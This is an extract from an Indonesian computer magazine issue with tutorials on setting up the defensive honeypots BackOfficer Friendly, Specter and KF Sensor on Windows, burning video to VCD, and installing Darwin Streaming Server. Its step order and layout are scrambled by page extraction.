Selama 2000-2001 tiba-tiba muncul worm yang berbasis Unix maupun Windows. Worm-worm ini sangat ampuh, berkembang biak secara eksponensial melalui Internet. Salah satu tantangan terhadap komunitas security adalah mendapatkan salinan dari worm ini untuk dipelajari. Mendapatkannya dari sistem yang terkena sangat sulit mengingat banyaknya data yang tercampur dengannya. Untuk itulah honeypot menunjukkan kegunaannya. Teknologi honeypot juga terbukti mampu menangkap exploit yang sebelumnya belum pernah dikenal, seperti yang terjadi pada 8 Januari 2002, suatu Solaris honeypot menangkap dtspcd exploit, suatu serangan yang sebelumnya belum pernah dikenal. Yang berminat mempelajari lebih jauh honeypots, selain menggali dari sumber-sumber online, silakan dapatkan dalam buku karya Lance Spitzner, Honeypots: Tracking Hacker yang menjadi inspirasi maupun materi dari rangkaian tulisan mengenai honeypot dalam NeoTek kali ini. Vol. IV No. 07 NeoTek
7

NeoStart

HONEYPOT
BACKOFFICER FRIENDLY PRODUCTION HONEYPOT
Teknologi honeypot tidaklah sederhana dan berbagai honeypot yang terbaik tidak berjalan pada Windows, melainkan berbagai varian Unix seperti Solaris, tetapi sebagai pemakai biasa, anda tetap bisa memahami konsep honeypot dengan menggunakan BackOfficer Friendly (BOF) yang berjalan pada Windows.

(BOF) MEMANG bukan honeypot yang terbaik, tetapi merupakan honeypot yang paling mudah instalasi dan pemakaiannya, serta terbaik untuk mengenal konsep honeypot. Berjalan pada segala jenis sistem operasi Windows, instalasinya sekedar double click saja dan segera memonitor (listen) ke berbagai jenis port yang paling lazim (http, ftp, pop3, smtp, dan telnet) selain port 31337 yang digunakan oleh trojan Back Orifice. BOF termasuk production honeypot dengan tingkat interaksi rendah, dan karena sederhana, mudah dikenali oleh para penyerang secara remote. Tujuannya memang bukan untuk riset, melainkan untuk menakutnakuti hacker pemula saja.

B

ACKOFFICER FRIENDLY

Kenali prinsip kerja honeypot dengan software sederhana BackOfficer Friendly.

4

LISTEN KE PORT 31337
Terlihat bahwa komputer ini kini memonitor port 31337. Komputer yang digunakan NeoTek merupakan bagian dari LAN dan local IPnya adalah 192.168.0.103, gateway 192.168.0.103. Adapun komputer-komputer lain dalam LAN IP-nya 192.168.0.x

5

LISTEN KE SEMUA PORT LAIN
Cukup klik pada submenu di bawah Options agar BOF listen pada port-port lain yaitu FTP, Telnet, SMTP, HTTP, POP3, dan IMAP2. Anda mungkin ingin juga mengaktifkan opsi Fake Reply untuk mengecoh para hacker.

6

PERIKSA DENGAN NETSTAT
Kembali ketikkan netstat -na pada MS-DOS Prompt dan terlihat bahwa kini komputer kita listen pada port-port 21 (ftp), 23 (telnet), 25 (smtp), 80 (http), 110 (pop3), dan 143 (imap2), selain 31337 (Back Orifice).

10

AKSES DENGAN FTP CLIENT
Jalankan FTP client (misalnya di sini digunakan WS_FTP Lite) dan pada Host Name/Address masukkan 192.168.0.103. Gunakan Anonymous access saja dan klik OK.

11

RESPONSE DIHASILKAN
Akses kita tidak berhasil dan akan ditampilkan pesan 503 Service Unavailable (pada komputer pengakses), tetapi pada komputer yang diakses yang terpasang BOF, akan terlihat pesan FTP connection from 192.168.0.101.

12

AKSES TELNET
Dari Start > Run ketikkan telnet 192.168.0.103 yang akan membuka login prompt pada jendela telnet, seolah-olah memang telnet server terpasang. Selang beberapa lama koneksi ini akan terputus.

8

NeoTek Vol. IV No. 07

NeoStart

1

INSTALASI BOF
Terdapat dua versi BOF (Windows dan Unix). Buka folder bof-nt dan cari nfrbofl.exe dan double click pada icon-nya yang akan membuka jendela dialog Install. Instalasi akan dilakukan pada C:\Program File\NFR\BackOfficer Friendly

2

OPSI-OPSI INSTALASI
Anda akan ditanya apakah BOF langsung listen setiap kali start, lalu apakah BOF segera listen. Bila menjawab Yes, instalasi pun selesai dan pada Windows bar sudah terlihat adanya icon BOF.

3

OPTIONS LISTEN TO PORT
Baru satu port yang langsung dimonitor oleh BOF, yaitu port yang biasa digunakan oleh trojan Back Orifice. Untuk melihat apakah benar port ini dimonitor, pada Start > Run ketikkan command untuk membuka MS-DOS Prompt dan ketikkan netstat -na

7

IP ADDRESS KOMPUTER
Untuk memastikan IP address komputer yang terinstal BOF, dari Start > Run ketikkan winipcfg dan terlihat bahwa IP address-nya 192.168.0.103. Kita akan mengakses berbagai service tadi dari komputer lain dalam LAN. Pada XP, diketahui lewat Open Network Connection

8

AKSES DARI KOMPUTER LAIN
Dari komputer lain pada LAN jalankan browser dan ketikkan URL http://192.168.0.103 yang akan menampilkan pesan kesalahan, tetapi pada komputer yang terinstal BOF tadi akan teramati adanya HTTP request from 192.168.0.101: GET /

9

FAKE REPLIES DIAKTIFKAN
Apabila Fake Replies diaktifkan. maka BOF akan menghasilkan jawaban seolah-olah web server memang terpasang, tetapi perlu otorisasi untuk mengaksesnya.

13

RESPONSE TERHADAP TELNET
Terlihat pada komputer yang diakses Telnet login from 192.168.101 yang disusul dengan pesan Telnet login timeout from 192.168.0.101. Kini kita coba akses POP Mail. Buka Outlook Express dan buat account baru dengan POP address 192.168.0.103.

14

AKSES POP GAGAL
Akses POP mail ke 192.168.0.103 memang gagal dengan pesan 503 Service Unavailable, tetapi pada komputer yang diakses terlihat adanya usaha mengakses ke port POP3 ini.

15

MONITOR ADANYA AKSES
BOF akan menampilkan pesan adanya usaha koneksi POP3 dari komputer lain, terlihat dari pesan POP3 connection from 192.168.0.101. Sederhana tetapi mengungkap jelas cara kerja honeypot, bukan?

Vol. IV No. 07 NeoTek

9

NeoStart

HONEYPOT
SPECTER 7.0: INSTALASI DAN PENGENALAN
Specter 7.0 merupakan honeypot komersial yang mampu mengemulasi 13 macam sistem operasi serta satu opsi random OS untuk mengecoh hacker. Berjalan hanya pada Windows NT family (NT, W2K, dan XP) serta lebih interaktif dibandingkan BackOfficer Friendly.

halaman web yang ditampilkan, akan menunjukkan web server (palsu) yang terpasang seperti IIS 5.1 pada Windows XP atau Apache server pada Solaris. Akses menggunakan telnet, FTP client, ataupun email client ke POP mail akan lebih ‘menantang’ hacker untuk membobolnya. Membobol masuk ke perangkapnya sendiri. Selain itu Specter dapat dikelola secara remote menggunakan Specter Remote. Untuk itu pada Specter tentukan dulu port remote management (default port 28) serta passwordnya. Setelah itu secara remote Specter Remote dapat mengakses Specter pada IP address dan port itu setelah memasukkan password.

M

EMANG LEBIH INTERAKTIF, TERLIHAT DARI

Hacker mengakses honeypot Specter dapat sibuk berusaha masuk ke perangkapnya sendiri.

1

INSTAL SPECTER 7.0
Pertama kali instal dulu WinRar (ada dalam CD NeoTek). Terdapat Specter dan Specter Remote. Yang pertama adalah honeypot yang akan kita instal. Yang kedua adalah remote manager terhadapnya. Double click setup.exe untuk memulai instalasi.

2

MENJALANKAN SPECTER
Jalankan Specter dari Start Menu dan akan tampil layar konfigurasi (yang sekaligus monitoring) dari Specter (gambar pendahuluan). Specter hanya dapat dijalankan pada Windows 2000, NT, dan XP. Instalasi dapat dilakukan pada 98/ME, tetapi tidak akan berjalan.

3

TETAPKAN HOST NAME
Pertama kali tetapkan Host Name sebagai apa saja seperti misalnya kosasih atau neotek.com.sg atau lainnya. Informasi tentang apa yang dimaksud dengan hal ini ditampilkan dalam jendela dialog yang muncul apabila tombol tanda tanya ditekan.

7

SOLARIS SERVER
Untuk pura-pura sebagai Solaris, klik Stop Engine, lalu pilih Solaris sebagai Operating System, dan klik lagi Start Engine. Kini akses http dari remote computer akan mendapat respon bahwa yang diakses adalah Apache Web Server pada mesin Solaris. Begitu miripnya sehingga hacker mudah terkecoh.

8

AKSES TELNET DAN FTP
Akses telnet pun akan menampilkan respon palsu seolah-olah mesin kita menjalankan Solaris 5.7 dan bila menjalankan FTP client, akan masuk ke direktori palsu pula.

10

NeoTek Vol. IV No. 07

NeoStart
Hal ini merupakan salah satu risiko pemakaian honeypot, sebab apabila suatu honeypot sudah ketahuan oleh hacker, maka pijakannya pada honeypot dapat menjadi landasan untuk menyerang komputer lain yang bukan honeypot, melainkan komputer produktif sesungguhnya. Walaupun jauh lebih lengkap dibandingkan BOF, Specter tetap dikategorikan sebagai production honeypot dan bukan untuk riset, mengingat terbatasnya informasi yang dapat dikumpulkan.

4

START ENGINE
Selanjutnya klik Start Engine dan akan tampak beberapa service akan dijalankan pada awal setup ini, yaitu ftp, telnet, smtp, finger, http, dan pop3 dengan sistem operasi Windows XP. Pada sistem ini walaupun IIS tidak diinstal, Specter akan mengemulasinya.

5

AKSES DARI KOMPUTER LAIN
Apabila dari komputer lain dilakukan akses dengan browser ke komputer ini (IP address 192.168.0.100) maka akan tampak seolah-olah mengakses IIS 5.1 seperti tampak di atas. Lebih interaktif dibandingkan Fake Replies pada BackOfficer Friendly.

6

LAYAR MONITOR
Sedangkan pada komputer yang dipasangkan Specter, terlihat adanya akses http dari remote computer, lengkap dengan IP address komputer pengakses.

9

AKSES POP MAIL
Buat account POP mail dengan nama pop mail server-nya 192.168.0.100 (sesuai dengan IP address komputer yang terpasang Specter) dan coba mengakses komputer ini sebagai pop mail server.

10

AKSES POP DITOLAK
Berbeda dengan BOF yang memberi pesan bahwa servis POP tidak ada, pada Specter dikatakan bahwa anda gagal mengakses karena tidak mempunyai password. Hacker akan tertantang untuk mendapatkan username dan password pada POP server palsu ini.

11

SEMUA DIMONITOR
Semua usaha mengakses dari remote computer ini ditampilkan dalam jendela monitor. Secara prinsip Specter serupa dengan BOF, namun dengan opsi-opsi jauh lebih lengkap dan mampu mengecoh hacker, sebab dapat meniru sistem operasi lain secara sangat terinci.

Vol. IV No. 07 NeoTek

11

NeoStart

HONEYPOT
SPECTER 7.0: OPSI DAN KONFIGURASI
Selain mengemulai 13 macam sistem operasi dan berbagai service yang umum, Specter juga menyediakan fasilitas Trap yang serupa dengan opsi Fake Replies pada BOF. Sayangnya emulasi yang dilakukan sebatas pada level operating system, dan tidak mengemulasi IP stack-nya.

NMAP YANG MAHIR DAPAT memanfaatkan port scanner ini bukan hanya untuk memeriksa portport apa saja yang terdapat dalam suatu sistem, melainkan juga dapat digunakan untuk mengirim berbagai jenis paket data yang kemudian merekam respon dari sistem untuk kemudian dipelajari apa sistem operasi sebenarnya dari sistem. Nmap dan tool lain yang mampu melakukan OS Fingerprinting, akan dapat mengidentifikasi adanya honeypot. Masalah ini umum terjadi pada low-interactive honeypot. Untuk mengatasi masalah ini sebaiknya apabila menginstal Specter pada sistem operasi Windows XP, maka setel Specter untuk mengemulasi Windows XP juga.

P

ENGGUNA

Kenali berbagai opsi Specter untuk memanfaatkannya secara optimal.

1 2

EMULASI SISTEM OPERASI
Ada 13 jenis sistem operasi yang dapat diemulasi Specter, berupa berbagai jenis Windows, MacOS, Linux, serta berbagai varian Unix, selain juga opsi Random. Karakter honeypot dapat mudah diakses (Open), fungsi relay diaktifkan (Secure), menakut-nakuti (Aggresive), atau seolah-olah salah setting (Failing).

SERVICE, TRAP, DAN PASSWORD TYPE
Service yang diemulasi: ftp, telnet, smtp, finger, http, pop3, dan netbus (trojan yang listen pada port 12345). Trap listen untuk membuat log terhadap koneksi terhadap dns, imap4, sun-rpc, ssh, sub-7, dan bo2k trojan. Jadi trap serupa dengan Fake Replies pada BOF. Password Type ditujukan untuk mengelabui penyerang. Bila karakter di-set Open atau Strange, maka penyerang dapat memperoleh password palsu, mulai dari yang dapat di-set dari yang mudah ditebak sampai yang memakan banyak waktu untuk di-crack. Opsi ini biasanya tidak banyak gunanya sebab automated attack umumnya melewati password file dan mencari jalan lain yang lebih mudah untuk masuk.

3

INTELLIGENCE DAN NOTIFICATION
Ada 11 opsi Intelligence untuk secara aktif mencari informasi mengenai penyerang, adapun Notification adalah cara untuk menginformasikan adanya serangan, dapat disimpan saja dalam Indident database untuk kemudian dipelajari dengan Log Analyzer. Notifikasi remote melalui alert dan short email sama fungsinya, dan status e-mail yang dikirim secara periodik hanya menginformasikan bahwa honeypot masih berfungsi.

6

INCIDENT INFO
Untuk mengetahui lebih lanjut tentang suatu incident, klik artikel pada kolom Type di jendela Log Analyzer (dalam hal ini artikel pertama, yaitu FTP). Jendela Incident Info untuk satu artikel itu akan ditampilkan. Jendela ini berupa protocol log. Informasi lain dapat dilihat dengan meng-klik tombol lain pada jendela ini.

7

INFORMASI LAIN
Apabila opsi-opsi Intelligence diaktifkan, maka akan lebih banyak informasi yang didapat, walaupun belum tentu semua informasi ini dapat diperoleh oleh Specter. Sebagai contoh adalah incident akses http yang jendela Incident Info-nya ditampilkan pada gambar berikut.

12

NeoTek Vol. IV No. 07

NeoStart
Apabila Specter dijalankan, maka yang mula-mula dijalankan adalah Specter Control yang baru kemudian menjalankan Specter engine sewaktu tombol Start Engine ditekan. Lisensi software terdapat pada Specter Engine dan bukan pada Specter Control. Incident yang terjadi (berupa berbagai akses ftp, http, dll terhadap sistem) disimpan dalam incident database yang kemudian dapat dianalisa menggunakan Log Analyzer (diaktifkan dengan menekan tombol Log Analyzer). Specter juga dapat disetel agar dapat diakses secara remote oleh Specter Remote dari IP, port, dan password yang ditetapkan terlebih dahulu. GUI Interface Specter Remote serupa dengan Specter, tetapi tanpa fasilitas Log Analyzer.

Tampilan GUI Specter Remote

4

OPSI-OPSI LAIN
Selain host name, terdapat opsi lain seperti Mail Server IP Address, Mail Address, dan Mail Address yang harus diisi dengan benar agar pesan dari Specter dapat diterima. Remote Management dan Port-nya adalah untuk menerima koneksi dari Specter Remote.

5

LOG ANALYZER
Klik tombol Log Analyzer yang akan menampilkan jendela Log Analyzer. Disini klik lagi tombol Search yang akan menampilkan informasi yang disimpan dalam Incident Database.

8

PROTOCOL LOG
Incident adanya akses http dari IP address 192.168.0.101 dengan DNS yang diketahui dapat ditelaah lebih jauh dengan meng-klik tomboltombol Finger, Port Scan, Telnet Banner, Ftp Banner, Smtp Banner, Http Header, Http Doc., Traceroute, dan Whois.

9

PORT SCAN DAN TELNET
Port scan menunjukkan port apa saja yang terbuka pada komputer penyerang, sedangkan Telnet Banner menunjukkan jenis telnet yang digunakan. Keduanya mengindikasikan sistem operasi yang digunakan penyerang.

10

SMTP SERVER DAN WHOIS
Smtp Banner menunjukkan bahwa penyerang menggunakan SMTP server lokal di komputernya sedangkan Whois menunjukkan informasi lebih jauh tentang IP Address yang bersangkutan (dalam hal contoh kita yang dalam LAN, info ini tidak banyak manfaatnya).

Vol. IV No. 07 NeoTek

13

NeoStart

HONEYPOT
KF SENSOR: DARI SPAM SAMPAI DOS
Spam merupakan gangguan yang menghambat kinerja Internet. Dari berbagai usaha mengatasinya adalah menciptakan honeypot yang menjadi Open Relay SMTP Server palsu, seperti yang dimainkan oleh KF Sensor. Selain itu KF Sensor juga dapat mengemulasi berbagai port serta mengatasi DoS.
Menjebak spammer dengan Open Relay SMTP Server bohongan.

keluarga Windows NT ini memang tidak mengemulasi sistem operasi lain, dan hanya berbagai port Windows NT saja, tetapi seperti juga Specter menyediakan komponen tambahan yang serupa dengan Trap pada Specter. Kelebihan KF Sensor justru pada emulasi Open Relay SMTP server serta kemampuannya untuk menangani DoS (Denial of Service) attack. Khusus untuk honeypot yang mengemulasi Open Relay SMTP Server, selain KF Sensor, anda mungkin perlu juga mempelajari Jackpot 1.2.2 yang memerlukan JRE pada Windows untuk menjalankannya (dapatkan keduanya di CD NeoTek kali ini).

H

ONEYPOT YANG HANYA BERJALAN PADA

4

EMAIL ALERTS
Apabila ada serangan, KF Sensor dapat mengirim pesan email. Isi email itu pada Send to: misalnya kosasih@neotek.co.id. Adapun pada bagian Send from: anda bisa isi dengan email sembarang (tidak harus email sungguhan), misalnya admin@neotek.com.sg

5

KOMPONEN TAMBAHAN
Anda ditanyakan apakah ingin menambah komponen yang perlu diemulasi. Ada banyak sekali pilihannya, tetapi untuk contoh ini tidak kita gunakan. Untuk itu klik untuk menghilangkan highlight pada setiap komponen dan klik Next untuk melanjutkan.

6

SEBAGAI SYSTEM SERVICE
Bila anda ingin KF Setup tetap berjalan, klik pada opsi Install as system service. Klik Next dan selanjutnya Finish untuk mengakhiri Setup Wizard.

10

SCENARIO
KF Sensor sebagai honeypot sudah menyediakan skenario utama (main scenario) yang dapat anda edit dan save sebagai skenario lain. Pilih Scenario > Edit Scenarios... yang akan menampilkan jendela dialog Edit Scenarios. Pada jendela ini klik tombol Edit...

11

PORT YANG DIEMULASI
Pada Edit Scenario kita dapat mengubah karakteristik dari setiap port yang diemulasi apakah suatu port di-set aktif serta tingkat keseriusan masalah apabila ada yang mencoba mengkoneksi ke port ini. KF Sensor amat baik sebagai SMTP server palsu yang seolah-olah suatu Open Relay SMTP Server.

12

DOS ATTACK SETTING
KF Sensor juga dilengkapi dengan fitur untuk menghadapi Denial of Service attack dengan menetapkan parameter-parameter untuk melock out ataupun ignore koneksi yang berasal dari client tertentu, banyaknya paket, ataupun ukuran paket.

14

NeoTek Vol. IV No. 07

NeoStart

1

INSTALASI KF SENSOR
Dapatkan KF Sensor evaluation dari Knowledge Focus pada CD NeoTek. Instalasinya sangat mudah dengan hanya double click kfsens10.exe dan ikuti saja langkah-langkahnya. Setelah instalasi anda harus merestart komputer anda.

2

SET UP WIZARD
Setelah restart KF Sensor berjalan dan pada taskbar terlihat icon berbentuk corong public announcement. Pada saat itu juga jendela dialog Set Up Wizard ditampilkan. Anda bisa mengklik Cancel dan men-setup lain kali, atau klik Next untuk memulai setup.

3

DOMAIN NAME
Seperti Host Name pada Specter, disini kita diminta mengisikan domain name. Isikan apa saja yang anda inginkan. Pada contoh misalnya diisikan domain name neotek.com.sg

7

PORT YANG DIEMULASI
Port TCP yang diemulasi mencakup: 21 (ftp), 22 (ssh), 23 (telnet), 25 (smtp), 53 (dns), 80 (iis), 110 (pop3), 443 (https), 1080 (socks), 1433 (SQL server), 3128 (http proxy), dan 8080 (http proxy). Sedangkan port UDP: 53 (dns) dan 1434 (SQL UDP Server). Bila tambahan diinstal, maka lebih banyak lagi.

8

SYSTEM SERVICE
Opsi System Service dapat dinonaktifkan ataupun diaktifkan pada menu File > Service lalu pilih Uninstall System Service atau Install As System Service. Disini juga server dapat di-Start, Stop, atau Restart.

9

OPSI VIEW
Pada awalnya View akan menurut port yang diemulasi, tetapi kelak bila sudah banyak data yang perlu dianalisa, mungkin anda perlu melihat data berdasarkan Visitor (IP address dari usaha koneksi yang masuk)

13

SEBAGAI SMTP RELAY SERVER
Setup email client agar smtp servernya adalah IP address komputer yang terpasang KF Sensor dan kirim email ke melalui SMTP server ini. Berbeda dengan BOF atau Specter yang menghasilkan error message, KF Sensor menerima dengan baik email ini tetapi tidak merelay-nya.

14

SPAM EMAIL JADI BUKTI
Spammer biasanya menggunakan Open Relay SMTP Server, tetapi bila terjebak menggunakan KF Sensor, email-nya akan ditangkap dan dijadikan bukti (terdapat dalam Event Details SMTP) dan bukan sungguh-sungguh dikirim ke alamat tujuan (Event Details sensor port 1092).

Vol. IV No. 07 NeoTek

15

NeoStyle

VIDEO EDITING

BURNING VIDEO KE FORMAT VCD

Q&A Lihat editing vi deoa penulis m antar para pe di gan eoTek den a N bac laman 4 ha

Pada langkah terakhir dari rangkaian artikel video editing, Andi Ismayadi (Fuzk3_kendi@yahoo.com) membahas proses encoding ke file MPEG yang dilanjutkan dengan konversi ke file untuk VCD (file .DAT) dan burning ke CD-R menggunakan Nero Burning Rom menjadi VCD.

yang panjang, akhirnya kita sampai ke langkah terakhir dalam membuat video pribadi. Dalam proses terakhir ini video akan melalui proses encoding/converting lagi, dan ketika di-burn ke CD, video ini akan kembali di-encode/convert menjadi format .DAT untuk format VCD. Dalam proses burning kita gunakan Nero Burning Rom. Untuk itu anda memerlukan CD writer. Adapun dalam memilih CD cari CD yang daya pantulnya lebih tinggi. Penulis sudah bereksperimen dan meminta saran-saran dari ahliahli video editing, dan ternyata dalam memilih CD sebaiknya cari CD yang lapisan bawahnya silver atau gold. Tidak dianjurkan memilih warna gelap seperti hitam.

S

ETELAH SIBUK DENGAN PROSES EDITING

Burning home video ke CD-R menjadi VCD agar dapat diputar di VCD player biasa.

4

BISA BURN DARI PINNACLE
Dalam Pinnacle pun tersedia opsi untuk burning langsung apabila anda tidak memiliki software untuk burning.

5

CREATE MPEG FILE
Setelah semua selesai di-cek, tekan tombol Create MPEG file; akan muncul pertanyaan dimana anda akan menyimpan file output (hasil) itu. Setelah itu akan terlihat proses encoding/converting-nya pada Interface Pinnacle Studio.

6

PERIKSA DENGAN PLAYER
Setelah selesai, kita cek kembali file output tadi dengan memakai software video, dalam hal ini penulis memakai Windows Media Player untuk mencek keberhasilan encoding/converting tadi.

10

VIDEO CD
Nah, disini ada apa yang kita cari yaitu Video CD , klik Next dan OK dan OK. Setelah itu kita akan masuk ke dalam menu Video CD.

11

RESPONSE DIHASILKAN
Perhatikan jendela browser kiri atas. Disini terlihat folder-folder untuk VCD, yang merupakan suatu format khusus dalam sebuah VCD agar disk yang dihasilkan kelak dapat diputar di VCD player.

12

DRAG-N-DROP KE MPEGAV
Cari file yang akan kita burn tadi di jendela browser sebelah kanan, lalu drag-n-drop file itu ke browser kiri atas (browser CD). Jangan lupa kita harus menaruh file itu ke folder MPEGAV dalam jendela browser kiri atas.

16

NeoTek Vol. IV No. 07

NeoStyle

1

PINNACLE STUDIO: MAKE MOVIE
Buka project yang anda buat dengan Pinnacle. Pastikan semuanya lengkap dan sudah siap. Kalau sudah di-burn masih mau diedit, hasilnya tidak sesuai harapan. Masuk ke tab Make Movie; terlihat media format yang akan anda encode/convert, juga terlihat info tentang besar file video setelah di-convert.

2

BILA MEMBUAT MPEG FILE
Pilihlah media MPEG lalu masuk ke setting-nya. Karena kita ingin membuat sebuah VCD maka pilih VideoCD dari pilihan-pilihan yang ada pada menu Presets.

3

BILA MEMBUAT AVI FILE
Apabila anda ingin membuat sebuah file video dengan Format AVI maka ketika masuk ke settingnya, anda akan melihat pilihan encoder-nya. semua setting ini kita biarkan Default.

7

KINI SIAP UNTUK BURNING
Yup, Hasilnya bagus. Sekarang yakinlah kita untuk masuk ke proses Burning.

8

BUKA NERO BURNING ROM
Buka Nero Burning Rom anda lewat Start > programs > Ahead Nero > Nero - Burning Rom. Akan tampil Wizard atau pembimbing dalam melakukan pilihan burning. Kita pilih untuk pertama kali Compile a New CD dan klik Next.

9

PILIHAN JENIS CD
Kita akan masuk ke jendela Wizard selanjutnya yang disini terdapat opsi-opsi untuk burning CD yaitu Audio CD, Data CD, dan Other CD formats. Pilih Other CD formats dan klik Next.

13

BILA ADA ERROR MESSAGE
Apabila dalam proses encoding di Pinnacle Studio terpilih format selain VCD maka ketika drop-ndrag akan tampil pertanyaan apakah ingin meng-encode ulang atau mengacuhkannya. Pilihan ini tidak terlalu berpengaruh.

14

CEK FILE .DAT YANG DIHASILKAN
Setelah men-drop file itu dan diencode menjadi file .DAT maka untuk meyakinkan dan mencek untuk terakhir kalinya anda dapat menekan tombol Play (dan kemudian Stop) di bagian bawah jendela browser kiri bawah.

15

MONITOR ADANYA AKSES
Setelah yakin, tekan Burn; tampil lagi Wizard yang meminta anda menentukan kecepatan burning. Ini tergantung pada kompatibilitas CD writer. Disarankan agar memilih kecepatan dibawah kecepatan maksimum, karena bila memilih maksimum, tingkat keberhasilan burning dan mutunya dipertaruhkan.

Vol. IV No. 07 NeoTek

17

NeoStyle

Darwin Streaming Server
Pada NeoTek Vol. III/09, kita telah mengenal SHOUTcast server yang berfungsi untuk membuat audio streaming, sehingga bisa digunakan untuk keperluan membuat radio internet. Pada artikel kali ini, Fitrianto Halim (fitriantoh@hotmail.com) akan membahas Darwin Streaming Server yang berfungsi untuk membuat audio dan video streaming, sehingga bukan hanya radio internet yang dapat dibuat bahkan TV internet juga dapat dibuat dengan menggunakan server ini.
server melalui suatu jaringan ke client secara realtime, baik melalui modem hingga broadband. Tiada file yang di-download ke hard drive client. Media dimainkan oleh suatu software di client begitu media tersebut diterima. Jika Anda ingin mengirimkan stream ke seseorang melalui internet ataupun jaringan lokal, maka anda membutuhkan streaming server untuk mengirimkan stream secara realtime. Streaming server mentransmisikan audio dan video stream ke individu sebagai response atas request dari individu tersebut yang misalkan berasal dari QuickTime player. Request ditangani menggunakan Real-Time Streaming Protocol (RTSP), suatu protokol untuk mengontrol sebuah stream dari real-time multimedia content. Stream dikirim menggunakan Real-Time Transport Protocol (RTP), suatu protokol transport untuk mentransmisikan real-time multimedia content melalui jaringan. Pengiriman untuk real-time streaming media dibagi dalam dua kategori, yaitu: live dan on demand. Darwin Streaming Server tidak memiliki kemampuan membroadcast suatu sumber yang live. Darwin Streaming Server hanya mampu mensimulasikannya dengan mem-broadcast content yang telah direkam dan dimasukkan sebagai suatu playlist. Secara umum, yang live secara teknis dikatakan multicast, sedangkan yang on demand secara teknis dikatakan unicast.

R AD I O DAN T V I NTE R N ET

S

TREAMING BERARTI MENGIRIMKAN MEDIA DARI SEBUAH

Darwin Streaming Server dapat dikonfigurasikan sebagai relay. Relay mendengarkan stream yang masuk (incoming stream) kemudian mem-forward stream tersebut ke satu atau lebih tujuan. Keuntungan dari relay adalah dapat mereduksi konsumsi bandwidth internet karena terjadi pembagian beban.

Instalasi Darwin Streaming Server
Darwin Streaming Server yang merupakan proyek open source dari Apple bisa Anda dapatkan pada URL berikut: http://developer.apple.com/darwin/projects/streaming/ Karena merupakan proyek open source, maka perkembangannya cukup pesat. Saat penulis mengunjungi URL tersebut pada akhir September 2003, yang tersedia adalah Darwin Streaming Server versi 4.1.3 . Namun saat penulis mengunjungi URL tersebut pada akhir bulan Desember, telah tersedia Darwin Streaming Server versi 5.0. Bila anda perhatikan, Darwin Streaming Server telah tersedia untuk beberapa platform operating system, seperti: • Mac OS X, v10.2.8 dan sesudahnya • Red Hat Linux 9 • Solaris 9 • Windows 2000 Server/Windows 2003 Server Untuk artikel ini, penulis membahas Darwin Streaming Server versi 5.0 menggunakan MS Windows 2000 Server. Perhatikan bahwa program tersebut tidak dapat di-download oleh alat bantu download, seperti DAP atau FlashGet. Mau tidak mau anda harus memilih Save Target As.... Karena beberapa file ada yang menggunakan Perl, maka Anda juga perlu meng-install Perl sebelum meng-install Darwin Streaming Server. Perhatikan bahwa Perl yang diminta adalah versi 5.8.0 ke atas. Untuk itu, Anda dapat mengunjungi URL berikut: http://www.activestate.com/Products/Download/ Get.plex?id=ActivePerl (bukan http://www.activeperl.com/ sebagaimana yang tercantum pada salah satu file Perl pada Darwin Streaming Server). Ada dua jenis installer, yaitu AS package dan MSI (MS Installer), yang pada AS package tidak terdapat fungsi uninstall, namun sangat dianjurkan bila anda mengalami kegagalan saat menggunakan jenis MSI. Berikut adalah langkah-langkah instalasi Darwin Streaming Server versi 5.0 (diasumsikan anda telah meng-install Perl versi 5.8.0 ke atas):
Multicast, unicast, dan relay.

18

NeoTek Vol. IV No. 07

NeoStyle
• Pertama-tama, jalankan file DarwinStreamingSrvr5.0Win.exe, kemudian tekan tombol Unzip.

• Akan terjadi dekompresi pada folder yang anda inginkan (disini C:\DarwinStreamingServer). • Pada DOS prompt, masuk ke C:\DarwinStreamingServer sebagai current directory dan jalankan batch file Install.bat.

• Pada bagian Darwin Streaming Server Setup W (WinPasswdAssistant.pl), masukkan user name dan password yang diminta untuk administrator baru.

• Proses awal Install.bat adalah membuat folder dan mengcopy file-file dari C:\DarwinStreamingServer. Folderfolder yang perlu diperhatikan adalah folder AdminHtml yang diperlukan saat kita mengkonfigurasi administrator Darwin Streaming Server serta folder Movies tempat file-file movie (3GPP, MPEG-4, dan MOV) dan file-file MP3 diletakkan (bisa diganti saat mengkonfigurasi administrator Darwin Streaming Server).

• Setelah proses penciptaan file qtgroups dan qtusers selesai, maka Streaming Admin Server akan dijalankan s (streamingadminserver.pl).

• Pada Installing the Darwin Streaming Server service, akan dijalankan file DarwinStreamingServer.exe dengan opsi -i , sehingga terbentuklah sebuah service baru.

Untuk menguji apakah hasil instalasi berhasil, jalankan QuickTime player dan coba untuk mem-playback URL berikut: rtsp://localhost/sample_100kbit.mov Selamat! Anda berhasil membuat video on demand. Karena Darwin Streaming Server service memiliki Startup Type dengan nilai Automatic dan Status dengan nilai Started (artinya secara otomatis selalu dihidupkan), maka selanVol. IV No. 07 NeoTek
19

NeoStyle
jutnya anda hanya perlu menjalankan Streaming Admin s Server (streamingadminserver.pl) melalui Perl untuk broadcast.

Konfigurasi Administrator Darwin Streaming Server
Sebenarnya saat kita menjalankan streamingadminserver.pl melalui Perl, kita telah menjalankan server atau daemon untuk administrator Darwin Streaming Server. Untuk membuktikannya, anda dapat menggunakan instruksi netstat -a di MS-DOS Prompt. Perhatikan ada sebuah buah port yang harus dalam status LISTENING, yaitu 1220. Agar administrator Darwin Streaming Server dapat dipanggil melalui web browser (misalkan Internet Explorer), maka kita harus mengkonfigurasikannya terlebih dahulu. • Pada Administrative Tools, klik Internet Services Manager.

Eksplorasi Darwin Streaming Server
Jika anda pelajari secara seksama, ada dua bagian utama dari Darwin Streaming Server, yaitu: • Darwin Streaming Server itu sendiri • Bagian administrator Darwin Streaming Server Bagian pertama terdapat pada file DarwinStreamingServer.exe. Untuk mengetahui seluruh opsi yang ada, coba jalankan dengan memberikan opsi -v :
DarwinStreamingServer -v DSS/5.0 ( Build/464; Platform/Win32; Release/5; ) Built on: Nov 11 2003, 19:03:33 usage: DSS [ -d | -p port | -v | -c /myconfigpath.xml | -o /myconfigpath.conf | -x | -S numseconds | -I | -h ] -d: Don't run as a Win32 Service -p XXX: Specify the default RTSP listening port of the server -c c:\myconfigpath.xml: Specify a config file path -o c:\myconfigpath.conf: Specify a DSS 1.x / 2.x config file path -x: Force create new .xml config file from 1.x / 2.x config -i: Install the Darwin Streaming Server service -r: Remove the Darwin Streaming Server service -s: Start the Darwin Streaming Server service -S n: Display server stats in the console every "n" seconds -I: Start the server in the idle state

